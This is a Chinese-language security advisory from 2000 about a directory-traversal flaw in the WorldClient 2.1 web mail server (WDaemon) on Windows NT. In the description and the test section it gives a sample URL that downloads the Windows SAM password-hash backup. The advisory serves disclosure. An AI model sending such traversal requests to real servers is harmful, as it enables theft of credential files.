发布日期：2000-07-17
更新日期：2000-07-17

受影响系统：

WorldClient Standard 2.1
  - Windows NT 4.0

描述：

---

web server WDaemon (World Client Daemon)是web邮件系统World Client 2.1的一部分,用来
提供HTTP接口，由于没有正确处理连结请求中包含的"..\"，攻击者可能远程下载任意已知路径和
名字的文件。例如，当提交类似下列的URL请求时：
http://email.example.com/..\..\..\winnt\repair\sam._
将会下载sam._文件。

注意：一些版本的浏览器会自动将'\' 替换成 '/'，因此可能不能进行正确验证

<* 来源：Rikard Carlsson (rikard.carlsson@INFOSEC.SE) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

在Linux 2.x下的Netscape 4.08中输入下列URL:

http://email.example.com/..\..\..\winnt\repair\sam._


建议：

---

暂无

浏览次数：6375
严重程度：0（网友投票）